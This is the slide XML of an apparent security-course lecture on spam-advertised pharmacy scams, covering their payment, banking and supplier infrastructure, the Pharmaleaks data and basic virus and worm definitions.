              <a:t>Okay, you’ve set up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.canadianpharma.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>... Now what?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To sell products, you need to be able to accept payments (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>realization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Merchant bank account to deposit your payments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relationship with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payment processing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handles credit card payments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Withdraws money from the buyers account via a card association network (e.g. Visa)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Obviously, most banks and processors won’t do business with scammers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fulfilment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scam sites almost always ship products to customers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Customer service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If too many customers complain to their credit card company, your payment processor will shut you down, and your bank account may be seized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Human operators to handle complaints and returns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300850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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="6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3" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>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12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="6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8" dur="5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8116"/>
            <a:ext cx="10515600" cy="928184"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Pharmacy Express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528009"/>
            <a:ext cx="12672215" cy="4620128"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Down 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3DCEA8E-62C5-483D-8DF7-1507C69378C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20774120">
            <a:off x="211369" y="1347077"/>
            <a:ext cx="735196" cy="1102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68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1.85185E-6 L 0.12526 -0.06643 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6263" y="-333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12526 -0.06643 L 0.12526 0.17546 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="1208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0.12526 0.17546 L 0.63476 -0.06852 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="25469" y="-1219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3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.63476 -0.06852 L 0.84882 0.03472 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="10703" y="516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4" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.84882 0.03472 L 0.4526 0.29329 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-19818" y="1291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5" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.4526 0.29329 L 0.67096 0.05347 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="10911" y="-1199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6" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.67096 0.05347 L 0.73658 0.15139 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="3281" y="4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3" grpId="4" animBg="1"/>
      <p:bldP spid="3" grpId="5" animBg="1"/>
      <p:bldP spid="3" grpId="6"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9595" y="84638"/>
            <a:ext cx="5070552" cy="6582646"/>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336" y="84638"/>
            <a:ext cx="5215760" cy="3958389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5859379" y="5197641"/>
            <a:ext cx="5863390"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Data collected from spam feeds, botnet infiltration, and various types of honeypots in Fall 2010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="319595" y="2743200"/>
            <a:ext cx="5070552" cy="38501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19595" y="561473"/>
            <a:ext cx="5070552" cy="38501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5735337" y="1275645"/>
            <a:ext cx="4151614" cy="1331824"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -54636"/>
              <a:gd name="adj2" fmla="val -88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RX-Promotion and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GlavMed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> account for around 35% of all affiliate scams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100774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7379"/>
            <a:ext cx="10515600" cy="909851"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Merchant Banks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1813" y="1117276"/>
            <a:ext cx="11468374" cy="4056204"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485899" y="5402080"/>
            <a:ext cx="888532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Researchers made 76 purchases from different affiliate programs to observe where payment was delivered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Only 13 banks, i.e. banking infrastructure is shared across affiliates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38024350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816"/>
            <a:ext cx="12192000" cy="5592368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="511992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1A437-89C7-4C8B-BA79-4BF2AA248FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Viruses and Worms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12750411-6FF8-41F9-939B-5BFC291E9764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self-replicating code that infects other programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When an infected program is run, the virus executes and spreads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very rare today, fallen out of fashion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Self-replicating program, does not require a host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECDE31EE-7B13-43F6-830E-CA91418D1D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16653" y="1915319"/>
            <a:ext cx="2085975" cy="2085975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93C28E0-BADC-443D-B210-859FF9AE3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9799" y="4001294"/>
            <a:ext cx="2539682" cy="2539682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164253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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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Suppliers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461836" y="5654841"/>
            <a:ext cx="8885321"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Goods were sourced from 13 different manufactures/suppliers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401" y="1491916"/>
            <a:ext cx="11645197" cy="3820339"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17270129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Pharmaleaks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In 2012, the databases for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GlavMed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpamIt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and RX-Promotion were breached, dumped, and publicly released</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is what happens when your competitors are criminals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contain complete logs of sales, customers, and affiliate relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pharmaleaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> paper analyzes this data to give us ground-truth understanding about this area of the underground economy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6683207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684" y="108283"/>
            <a:ext cx="10199784" cy="168442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0665" y="2008887"/>
            <a:ext cx="7075821" cy="4752861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3622412" y="2322094"/>
            <a:ext cx="2730264" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Transaction Volume</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37664643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11" y="1407697"/>
            <a:ext cx="6327506" cy="442762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2774" y="1347540"/>
            <a:ext cx="5358753" cy="4487780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1455722" y="657271"/>
            <a:ext cx="3728883" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>New vs. Repeat Customers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467708" y="657270"/>
            <a:ext cx="3728883" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Types of Products</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20248570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Profit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240631" y="2487791"/>
            <a:ext cx="6220326" cy="1914761"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pharma scams bring in a lot of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>revenue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… but are they actually making a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>profit</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6721" y="240631"/>
            <a:ext cx="5076888" cy="6409082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872788" y="1321813"/>
            <a:ext cx="1588169" cy="782053"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 89773"/>
              <a:gd name="adj2" fmla="val 101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Payments to affiliates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872788" y="4097098"/>
            <a:ext cx="1588169" cy="782053"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 104924"/>
              <a:gd name="adj2" fmla="val -159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Bulletproof hosting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4872787" y="5083213"/>
            <a:ext cx="1588169" cy="970634"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 104166"/>
              <a:gd name="adj2" fmla="val -233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Spammers and botnet operators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACBB3FA7-CDA3-4B4D-86F8-748DFAF74A97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6796721" y="937888"/>
            <a:ext cx="5204211" cy="509518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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21D3D22A-DB4F-4BEB-A14E-39907E1E01AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
